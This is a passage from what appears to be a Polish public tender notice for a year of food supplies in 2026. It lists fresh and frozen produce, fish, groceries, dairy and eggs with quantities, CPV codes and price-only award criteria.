zdrowy, świeży bez uszkodzeń i zanieczyszczeń z wyłączeniem importu z Chin	kg.	80<br/>20	Dynia	kg.	80<br/>21	Fasola szparagowa świeża	kg.	100<br/>22	Grejpfrut	szt.	500<br/>23	Gruszki	kg.	450<br/>24	Jabłka zdrowe, bez uszkodzeń w kartonach lub skrzynkach	kg.	5000<br/>25	Jagody	kg.	50<br/>26	Kalafior świeży, czysty, suchy bez uszkodzeń i zanieczyszczeń	szt.	100<br/>27	Kapusta biała o świeżym wyglądzie bez uszkodzeń i zanieczyszczeń (czerwiec,lipiec,sierpień,wrzesień)	szt.	500<br/>28	Kapusta biała o świeżym wyglądzie bez uszkodzeń i zanieczyszczeń (pozostałe miesiące)	kg.	800<br/>29	Kapusta czerwona zdrowa, czysta bez uszkodzeń (czerwiec,lipiec,sierpień, wrzesień)	szt.	150<br/>30	Kapusta czerwona zdrowa, czysta bez uszkodzeń (pozostałe miesiące)	kg.	500<br/>31	Kapusta kiszona z marchewką bez oznak gnicia w wiadrach 5 kg	kg.	1000<br/>32	Kapusta pekińska świeża, prawidłowo wykształcona bez uszkodzeń	kg.	800<br/>33	Kapusta włoska , czysta bez uszkodzeń	kg.	250<br/>34	Kiwi	szt.	4000<br/>35	Koperek zielony świeży w pęczkach (pozostałe miesiące)	pęczek	1200<br/>36	Koperek zielony świeży w pęczkach(maj, czerwiec,lipiec,sierpień)	pęczek	600<br/>37	Maliny	kg.	50<br/>38	Mandarynki	kg.	600<br/>39	Marchew I gat. świeża, zdrowa, czysta bez uszkodzeń,workowana 10 kg	kg.	2500<br/>40	Melon	szt.	200<br/>41	Morele	szt.	500<br/>42	Natka pietruszki świeża w pęczkach (maj, czerwiec,lipiec,sierpień)	pęczek	600<br/>43	Natka pietruszki świeża w pęczkach (pozostałe miesiące)	pęczek	600<br/>44	Nektarynki	kg.	250<br/>45	Ogórek kiszony z przyprawami, zdrowy,twardy bez oznak pleśni i gnicia, wiadro 3 kg	kg.	800<br/>46	Ogórek zielony świeży, czysty bez uszkodzeń (czerwiec,lipiec,sierpień,wrzesień)	kg.	850<br/>47	Ogórek zielony świeży, czysty bez uszkodzeń (pozostałe miesiące)	kg.	900<br/>48	Papryka kolorowa świeża bez uszkodzeń i zanieczyszczeń	kg.	1200<br/>49	Pieczarka świeża bez uszkodzeń i pleśni	kg.	200<br/>50	Pietruszka korzeń zdrowa,czysta bez uszkodzeń	kg.	800<br/>51	Pomarańcze gat. I , zdrowe bez uszkodzeń i oznak gnicia	kg.	1000<br/>52	Pomidor świeży, czysty bez uszkodzeń (maj, czerwiec, lipiec, sierpień, wrzesień)	kg.	1500<br/>53	Pomidor świeży, czysty bez uszkodzeń (pozostałe miesiące)	kg.	1800<br/>54	Por zdrowy, prawidłowo wykształcony, świeży	szt.	1300<br/>55	Porzeczka	kg.	50<br/>56	Roszponka	kg.	600<br/>57	Rukola	kg.	600<br/>58	Rzodkiew biała sopel	kg.	1000<br/>59	Rzodkiewka(czerwiec, lipiec, sierpień,wrzesień)	pęczek	1100<br/>60	Rzodkiewka(pozostałe miesiące)	pęczek	500<br/>61	Sałata zielona( czerwiec, lipiec,sierpień,wrzesień)	szt.	1800<br/>62	Sałata lodowa 1szt. nie mniej niż 400g	szt.	1300<br/>63	Sałata masłowa	szt.	500<br/>64	Sałata zielona (pozostałe miesiące)	szt.	1600<br/>65	Seler korzeń, zdrowy,czysty bez uszkodzeń	kg.	1000<br/>66	Szczypiorek świeży w pęczkach( czerwiec, lipiec, sierpień,wrzesień)	pęczek	500<br/>67	Szczypiorek świeży w pęczkach(pozostałe miesiące)	pęczek	900<br/>68	Śliwki	kg.	400<br/>69	Truskawka świeża bez pleśni i nadgnicia	kg.	300<br/>70	Winogrona białe	kg.	350<br/>71	Wiśnia	kg.	60<br/>72	Ziemniaki odmiana jednorodna w każdej dostawie bez uszkodzeń, plam chorobowych i kiełków, workowane 10-15 kg	kg.	11000<br/>73	Ziemniaki młode, odmiana jednorodna, świeże bez uszkodzeń, workowane 10-15 kg(czerwiec,lipiec sierpień)	kg.	4000<br/>74	Kiełki lucerny	kg.	50<br/>75	Kiełki rzodkiewki	kg.	50<br/>76	Kiełki słonecznika	kg.	50<br/>77	Kiełki brokułu	kg.	50<br/>Szczegółowy wykaz asortymentowy stanowiący opis przedmiotu zamówienia określa załącznik nr 1c do specyfikacji warunków zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">03200000-3 - Zboża, ziemniaki, warzywa, owoce i orzechy</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-01 do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryteria oceny ofert - zamawiający uzna oferty za spełniające wymagania i przyjmie do szczegółowego rozpatrywania, jeżeli:<br/>1.	oferta, spełnia wymagania określone niniejszą specyfikacją,<br/>2.	oferta została złożona, w określonym przez zamawiającego terminie,<br/>3.	wykonawca przedstawił ofertę zgodną co do treści z wymaganiami zamawiającego.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Warzywa i owoce mrożone, ryby mrożone, ryby przetworzone i konserwowane.<br/> Nazwa artykułu	Jm	Ilość<br/>1	Brokuły mrożone kwiatek opakowania 2-5 kg	kg.	900<br/>2	Brukselka mrożona opakowania 2-5 kg	kg.	50<br/>3	Bób mrożony opakowanie 2-5 kg	kg.	15<br/>4	Fasolka szparagowa zielona mrożona cięta opakowania 2-5 kg	kg.	150<br/>5	Fasolka szparagowa żółta mrożona cięta opakowania 2-5kg	kg.	200<br/>6	Filet z dorsza mrożony, (400-900g) SHP do 5% technologicznej glazury	kg.	600<br/>7	Filet z mintaja mrożony, jeden gatunek ,(nie mniej niż 160 g) SHP do 5% technologicznej glazury	kg.	300<br/>8	Filet z morszczuka mrożony,( nie mniej niż 150g)SHP do 5% technologicznej glazury z wykluczenie importu z Chin	kg.	800<br/>9	Groszek zielony mrożony	kg.	200<br/>10	Kalafior mrożony kwiatek opakowania 2-5kg	kg.	600<br/>11	Karp patroszony	kg.	50<br/>12	Makrela w oleju	kg.	70<br/>13	Makrela wędzona luz M , L	kg.	50<br/>14	Marchew mrożona opakowania 2-10kg	kg.	380<br/>15	Mieszanka mrożona 7 składnikowa opakowania 2-10kg	kg.	500<br/>16	Owoce mrożone aronia	kg.	50<br/>17	Owoce mrożone truskawka	kg.	50<br/>18	Owoce mrożone wiśnia	kg.	50<br/>19	Owoce mrożone czarna porzeczka	kg.	50<br/>20	Mieszanka kompotowa mrożona (śliwka, jabłko, agrest, aronia, porzeczka czerwona, wiśnia) opakowania 2-5kg	kg.	1100<br/>21	Mieszanka kompotowa mrożona (wiśnia, śliwka, czerwona porzeczka, aronia, truskawka) opakowania 2-5kg	kg.	300<br/>22	Miruna bez skóry mrożona ,( nie mniej niż 300g) SHP do 5% technologicznej glazury	kg.	200<br/>23	Papryka mrożona opakowania 2-5kg	kg.	300<br/>24	Paprykarz szczeciński (puszka 0,341kg)	kg.	100<br/>25	Pasta z makreli (wiadro 3 kg)	kg.	30<br/>26	Pieczarka mrożona opakowania 2-5kg	kg.	500<br/>27	Pyzy z mięsem mrożone opakowanie 2,5 kg	kg.	350<br/>28	Pyzy bez mięsa opakowanie 2,5 kg	kg.	260<br/>29	Seler mrożony opakowania 2-5kg	kg.	300<br/>30	Szpinak mrożony opakowania 2-5 kg	kg.	300<br/>31	Szprot w oleju (0,18kg)	kg.	50<br/>32	Szprot w pomidorach(0,18kg)	kg.	150<br/>33	Śledź matias w wiaderku(4kg)	kg.	250<br/>34	Tuńczyk w oleju (w kawałkach ) puszka z otwieraczem	kg.	20<br/>35	Tuńczyk w sosie własnym (w kawałkach )puszka z otwieraczem	kg.	250<br/>36	Włoszczyzna paski mrożona opakowania 2-10 kg	kg.	1500<br/>Szczegółowy wykaz asortymentowy stanowiący opis przedmiotu zamówienia określa załącznik nr 1d do niniejszej specyfikacji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15331170-9 - Warzywa mrożone</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-01 do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryteria oceny ofert - zamawiający uzna oferty za spełniające wymagania i przyjmie do szczegółowego rozpatrywania, jeżeli:<br/>1.	oferta, spełnia wymagania określone niniejszą specyfikacją,<br/>2.	oferta została złożona, w określonym przez zamawiającego terminie,<br/>3.	wykonawca przedstawił ofertę zgodną co do treści z wymaganiami zamawiającego.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Różne produkty spożywcze, kakao, wyroby cukiernicze, kawa, herbata, sosy, przyprawy i zioła, zupy i buliony, owoce konserwowane, owoce suszone, soki, napoje i woda mineralna.<br/> Nazwa artykułu	Jm	Ilość<br/>1	Barszcz w płynie opakowanie 0,5 l	litr.	20<br/>2	Bazylia suszona	kg.	4<br/>3	Budyń	kg.	30<br/>4	Chrupki kukurydziane bezglutenowe opakowanie do 60 g	szt.	300<br/>5	Chrzan konserwowy	kg.	130<br/>6	Ciecierzyca kabuli sucha kg.	100<br/>7	Cukier biały	kg.	1400<br/>8	Cukier puder	kg.	20<br/>9	Cukier wanilinowy (32g)	kg.	4<br/>10	Cynamon	kg.	2<br/>11	Czekolada z dużą zawartością (&gt;70%)kakao	szt.	200<br/>12	Czosnek niedźwiedzi suszony ( bez glutenu i laktozy, jaj)	kg.	4<br/>13	Czosnek suszony ( bez glutenu i laktozy, jaj)	kg.	4<br/>14	Czubryca czerwona( bez glutenu i laktozy, jaj)	kg.	0,5<br/>15	Czubryca zielona( bez glutenu i laktozy, jaj)	kg.	0,5<br/>16	Ćwikła	kg.	60<br/>17	Dżemiki 1 razowe	szt.	5000<br/>18	Fasola suszona(drobna i gruba)	kg.	200<br/>19	Fasolka konserwowa kolorowa(ziarno)	kg.	100<br/>20	Fasolka konserwowa szparagowa cięta (puszka)	kg.	20<br/>21	Galaretka owocowa różne smaki( bez glutenu i laktozy)	kg.	30<br/>22	Groch suszony łuskany	kg.	180<br/>23	Groszek konserwowy(puszka z otwieraczem)	kg.	100<br/>24	Groszek ptysiowy opakowanie do 0,5 kg	kg.	45<br/>25	Herbata expresowa- torebka	kg.	200<br/>26	Herbata owocowa	kg	100<br/>27	Kakao naturalne extra ciemne nierozp. (tłuszcz kakaowy 10-12%, bez gorczycy i selera, glutenu i laktozy) (200g)	kg.	60<br/>28	Kasza bulgur	kg.	80<br/>29	Kasza gryczana	kg.	300<br/>30	Kasza jaglana	kg.	100<br/>31	Kasza jęczmienna	kg.	250<br/>32	Kasza manna(nie expresowa)	kg.	100<br/>33	Kasza orkiszowa 50<br/>34	Kasza perłowa	kg.	50<br/>35	Kasza pęczak	kg.	40<br/>36	Kawa zbożowa (500g)	kg.	50<br/>37	Ketchup	kg.	120<br/>38	Kisiel owocowy różne smaki( bez glutenu, laktozy, jaj)	kg.	30<br/>39	Kleik ryżowy	szt.	50<br/>40	Kokos do ciasta	kg.	1<br/>41	Kolendra liście	kg.	0,5<br/>42	Kolendra przyprawa ziarno( bez glutenu, laktozy, jaj)	kg.	0,5<br/>43	Komosa ryżowa	kg	30<br/>44	Kompot aronia	kg.	50<br/>45	Kompot czarna porzeczka	kg.	30<br/>46	Kompot śliwka	kg.	30<br/>47	Kompot truskawka	kg.	30<br/>48	Kompot wiśnia	kg.	30<br/>49	Koncentrat pomidorowy 30% puszka 0,8 kg( bez glutenu, laktozy, jaj)	kg.	250<br/>50	Koperek suszony( bez glutenu, laktozy, jaj)	kg.	2<br/>51	Kotlety sojowe	kg	20<br/>52	Krem do tortu różne smaki	szt.	10<br/>53	Kukurydza konserwowa(z otwieraczem)	kg.	150<br/>54	Kuskus	kg.	50<br/>55	Kutia gotowa	kg.	2<br/>56	Kwasek cytrynowy kg.	4<br/>57	Liść laurowy (opakowanie do 0,5kg)( bez glutenu, laktozy, jaj)	kg.	8<br/>58	Lubczyk suszony( bez glutenu, laktozy, jaj)	kg.	60<br/>59	Majeranek (opakowanie do 0,5kg)( bez glutenu, laktozy,jaj)	kg.	10<br/>60	Majonez dekoracyjny (0,7kg )( bez glutenu, laktozy, jaj)	kg	330<br/>61	Makaron spagetti na mące durum opakowanie 3kg	kg.	160<br/>62	Makaron bezjajeczny	kg	30<br/>63	Makaron gryczany	kg	40<br/>64	Makaron kokarda na mące durum opakowanie 3 kg	kg.	120<br/>65	Makaron łazanki na mące durum opakowanie 3 kg	kg.	40<br/>66	Makaron muszelki na mące durum opakowanie 3 kg	kg.	40<br/>67	Makaron nitki na mące durum opakowanie 3 kg	kg.	120<br/>68	Makaron orkiszowy	kg	30<br/>69	Makaron razowy	kg	50<br/>70	Makaron rurka na mące durum opakowanie 3 kg	kg.	50<br/>71	Makaron ryżowy opakowanie 3kg	kg.	100<br/>72	Makaron świderki na mące durum opakowanie 3 kg	kg.	100<br/>73	Makaron żytni do 1,5 kg	kg.	200<br/>74	Masa makowa	kg.	3<br/>75	Mąka pszenna wrocławska typ 500	kg.	400<br/>76	Mąka gryczana	kg	30<br/>77	Mąka krupczatka	kg.	50<br/>78	Mąka kukurydziana	kg	30<br/>79	Mąka pszenna tortowa typ 405	kg.	300<br/>80	Mąka ryżowa	kg	20<br/>81	Mąka sojowa	kg	30<br/>82	Mąka ziemniaczana	kg.	60<br/>83	Miód naturalny 1 razowe opakowanie szt.	2500<br/>84	Muesli bez dodatku cukru i jego zamienników	kg	100<br/>85	Mus owocowy 250 g	szt.	4000<br/>86	Mus warzywny 250 g	szt.	4000<br/>87	Musztarda sarepska opakowanie 1kg	kg.	100<br/>88	Ocet balsamiczny	litr.	4<br/>89	Ocet jabłkowy	litr.	4<br/>90	Ocet spirytusowy 10% kwasowości opakowanie 1L	litr.	3<br/>91	Ogórki konserwowe	kg.	200<br/>92	Olej rzepakowy	litr.	900<br/>93	Oliwa z oliwek	litr.	400<br/>94	Oliwki cięte słoik	kg.	110<br/>95	Oregano suszone	kg.	2<br/>96	Orzechy włoskie łuskane	kg.	3<br/>97	Otręby orkiszowe	kg	20<br/>98	Otręby owsiane	kg	20<br/>99	Otręby pszenne	kg.	10<br/>100	Otręby żytnie	kg	20<br/>101	Papryka chili mielona opakowanie 0,5 kg ( bez glutenu, laktozy, jaj)	kg.	4<br/>102	Papryka konserwowa ćwiartki	kg.	200<br/>103	Papryka ostra sypka 100% opakowanie 0,5 kg ( bez glutenu, laktozy, jaj)	kg.	6<br/>104	Papryka słodka sypka 100% opakowanie 0,5 kg( bez glutenu, laktozy, jaj)	kg.	12<br/>105	Papryka wędzona sypka 100% opakowanie 0,5 kg ( bez glutenu, laktozy, jaj)	kg.	6<br/>106	Pestki dyni	kg	15<br/>107	Pędy bambusa konserwowe (200-300g)	kg.	4<br/>108	Pieczarka konserwowa kg.	60<br/>109	Pieprz cytrynowy opakowanie 0,5 kg( bez glutenu, laktozy, jaj)	kg.	4<br/>110	Pieprz czarny 100% mielony opakowanie 0,5 kg( bez gluten, laktozy, jaj)	kg.	30<br/>111	Pieprz ziołowy opakowanie 0,5 kg( bez glutenu, laktozy, jaj)	kg.	4<br/>112	Pietruszka suszona opakowanie do 0,3 kg( bez glutenu, laktozy, jaj)	kg.	2<br/>113	Płatki gryczane	kg	30<br/>114	Płatki jęczmienne	kg	30<br/>115	Płatki naturalne błyskawiczne owsiane	kg	30<br/>116	Płatki naturalne błyskawiczne ryżowe	kg	30<br/>117	Płatki owsiane(niebłyskawiczne)	kg.	100<br/>118	Płatki ryżowe	kg	30<br/>119	Pomidory suszone w zalewie kg.	40<br/>120	Pomidory w puszce bez skóry	kg.	500<br/>121	Proszek do pieczenia(30g)	kg.	15<br/>122	Przyprawa chińska 0,5-1 kg( bez glutenu, laktozy, jaj)	kg.	2<br/>123	Przyprawa curry( bez glutenu, laktozy, jaj)	kg.	7<br/>124	Przyprawa do flaków( bez glutenu, laktozy, jaj)	kg.	3<br/>125	Przyprawa do gyrosa( bez glutenu, laktozy, jaj)	kg.	1<br/>126	Przyprawa do ryb opakowanie 800g( bez dodatku soli, glutaminianu sodu, konserwantów, sztucznych barwników glutenu, laktozy, jaj)	kg.	3<br/>127	Przyprawa gałka muszkatołowa( bez glutenu, laktozy, jaj)	kg.	3<br/>128	Przyprawa imbir( bez glutenu, laktozy, jaj)	kg.	3<br/>129	Przyprawa kurkuma ( bez glutenu, laktozy, jaj)	kg.	10<br/>130	Rodzynki	kg.	1<br/>131	Rozmaryn suszony( bez glutenu, laktozy, jaj)	kg.	1<br/>132	Ryż biały	kg.	600<br/>133	Ryż brązowy 300<br/>134	Ryż czerwony 300<br/>135	Seler konserwowy	kg.	300<br/>136	Skrobia kukurydziana	kg	5<br/>137	Skrobia pszenna	kg.	5<br/>138	Skrobia ryżowa	kg.	5<br/>139	Skrobia ziemniaczana	kg.	50<br/>140	Słonecznik łuskany (opakowanie do 250g)	kg.	10<br/>141	Soczewica czarna sucha kg.	80<br/>142	Soczewica czerwona sucha kg.	250<br/>143	Soczewica zielona sucha	kg.	150<br/>144	Soda spożywcza	kg.	3<br/>145	Soja konserwowa(kiełki)	kg.	250<br/>146	Soja ziarno	kg.	200<br/>147	Sok bananowy cukry do 12 g na 100 ml 1 szt. 200-300 ml	szt.	1200<br/>148	Sok jabłkowy cukry do 12 g na 100 ml 1szt. 200-300 ml	szt.	1200<br/>149	Sok marchewkowy bez dodatku soli 1 szt. 200-300 ml	szt.	1200<br/>150	Sok pomarańczowy cukry do 9 g na 100 ml 1szt. 200-300 ml	szt.	1200<br/>151	Sok pomidorowy bez dodatku soli 1 szt. 200-300 ml szt.	1200<br/>152	Sos sojowy	litr.	5<br/>153	Sól	kg.	700<br/>154	Suchary bez cukru	szt.	60<br/>155	Suszone warzywa 100%, bez glutaminianu sodu, glutenu i laktozy	kg.	300<br/>156	Szczaw konserwowy	kg.	100<br/>157	Śmietana w proszku do tortów	kg.	2<br/>158	Tapioka	kg	10<br/>159	Tymianek suszony( bez glutenu i laktozy)	kg.	4<br/>160	Wafle ryżowe opakowanie 100 g	szt.	400<br/>161	Woda mineralna gazowana 500ml	szt.	500<br/>162	Woda mineralna niegazowana 500ml	szt.	6000<br/>163	Zacierka	kg.	180<br/>164	Ziele angielskie mielone (op.do 0,5kg)( bez glutenu, laktozy, jaj)	kg.	9<br/>165	Ziele angielskie ziarno (op.do 0,5kg)( bez glutenu, laktozy, jaj)	kg.	7<br/>166	Zioła prowansalske( bez glutenu, laktozy, jaj)	kg.	1<br/>167	Żelatyna (op.do 0,5kg)	kg.	20<br/>168	Żurek zakwas 0,5 l	litr.	60<br/>Szczegółowy wykaz asortymentowy stanowiący opis przedmiotu zamówienia określa załącznik nr 1e do niniejszej specyfikacji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-01 do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryteria oceny ofert - zamawiający uzna oferty za spełniające wymagania i przyjmie do szczegółowego rozpatrywania, jeżeli:<br/>1.	oferta, spełnia wymagania określone niniejszą specyfikacją,<br/>2.	oferta została złożona, w określonym przez zamawiającego terminie,<br/>3.	wykonawca przedstawił ofertę zgodną co do treści z wymaganiami zamawiającego.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Mleko, śmietana, twaróg, sery, jogurty. <br/> Nazwa artykułu	Jm	Ilość<br/>1	Drożdże piekarskie świeże (100 g)	kg.	25<br/>2	Jogurt naturalny 150g ( cukry 3,5 – 5 g/100g)	szt.	13000<br/>3	Jogurt naturalny bez laktozy	szt.	1000<br/>4	Jogurt z dodatkami owoców(150g)( cukry 6-8 g/100g)	szt.	5000<br/>5	Jogurt z dodatkami owoców 150g bez laktozy	szt.	1000<br/>6	Kefir (200g)	szt.	7000<br/>7	Kefir bez laktozy 400 g	szt.	1000<br/>8	Margaryna kg.	25<br/>9	Masełko jednorazowe, zawartość tłuszczu min. 82%	szt.	800<br/>10	Masełko jednorazowe bez laktozy, zawartość tłuszczu min. 82%	szt.	100<br/>11	Masło,zawartość tłuszczu min. 82% (200g)	kg.	1400<br/>12	Masło bez laktozy tłuszcz 82% (200g)	kg.	100<br/>13	Mleko UHT 1,5%(karton jeden litr)	litr	6000<br/>14	Mleko bez laktozy 1,5 % UHT ( karton jeden litr)	litr	1000<br/>15	Ser mozzarella (1 kulka 125g) ( o obniżonej zawartości tłuszczu do 15%)	szt.	7000<br/>16	Ser mozzarella bez laktozy	szt.	500<br/>17	Ser pleśniowy camembert	kg.	100<br/>18	Ser żółty twardy półtłusty( wykluczając produkty seropodobne) ( tłuszcz 20-25%)	kg.	50<br/>19	Ser żółty twardy chudy (wykluczając produkty seropodobne) (tłuszcz poniżej 15 %)	kg.	500<br/>20	Ser żółty twardy chudy bez laktozy ( tłuszcz poniżej 15%)	kg.	50<br/>21	Ser typu feta 270g (do 10% tłuszczu)	szt.	700<br/>22	Ser typu włoskiego ( do 15% tłuszczu)	kg.	100<br/>23	Ser typu greckiego( do 15% tłuszczu) opakowanie 150 g	szt.	800<br/>24	Ser typu feta bez laktozy ( do 10% tłuszczu)	szt.	70<br/>25	Serek fromage 80g ( do 20 % tłuszczu)	szt.	3500<br/>26	Serek fromage bez laktozy ( do 20 % tłuszczu)	szt.	200<br/>27	Serek homogenizowany ( węglowodany 2-5 g/100g w tym cukry 3-5 g/100g)	szt.	4000<br/>28	Serek homogenizowany bez laktozy ( węglowodany 2-5 g/100g w tym cukry 3-5 g/100g)	szt.	500<br/>29	Serek kiri (opakowanie100gx6szt.)	op.	2200<br/>30	Serek tartare(opakowanie 60sztx20g) naturalny op.	300<br/>31	Serek wiejski (200g) (tłuszcz do 5 g/100 g)	szt.	6000<br/>32	Serek wiejski bez laktozy 200 g ( tłuszcz do 5 g/100)	szt.	500<br/>33	Śmietanka 12% 200 g	litr	600<br/>34	Maślanka 1l	litr	500<br/>35	Twaróg chudy naturalny (tłuszcz do 0,1 g/100g) kg.	800<br/>36	Twaróg półtłusty naturalny ( tłuszcz do 4 g/100g) kg.	200<br/>37	Twaróg chudy naturalny bez laktozy (tłuszcz do 0,1 g/100g) kg.	100<br/>Szczegółowy wykaz asortymentowy stanowiący opis przedmiotu zamówienia określa załącznik nr 1f do niniejszej specyfikacji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15500000-3 - Produkty mleczarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-01 do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryteria oceny ofert - zamawiający uzna oferty za spełniające wymagania i przyjmie do szczegółowego rozpatrywania, jeżeli:<br/>1.	oferta, spełnia wymagania określone niniejszą specyfikacją,<br/>2.	oferta została złożona, w określonym przez zamawiającego terminie,<br/>3.	wykonawca przedstawił ofertę zgodną co do treści z wymaganiami zamawiającego.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Jaja konsumpcyjne świeże. <br/>	Nazwa artykułu	Jm	Ilość<br/>1	Jaja konsumpcyjne kurze kl”L”	szt	65000<br/>Szczegółowy wykaz asortymentowy stanowiący opis przedmiotu zamówienia określa załącznik nr 1g do niniejszej specyfikacji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">03142500-3 - Jaja</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-01 do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryteria oceny ofert - zamawiający uzna oferty za spełniające wymagania i przyjmie do szczegółowego rozpatrywania, jeżeli:<br/>1.	oferta, spełnia wymagania określone niniejszą specyfikacją,<br/>2.	oferta została złożona, w określonym przez zamawiającego terminie,<br/>3.	wykonawca przedstawił ofertę zgodną co do treści z wymaganiami zamawiającego.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 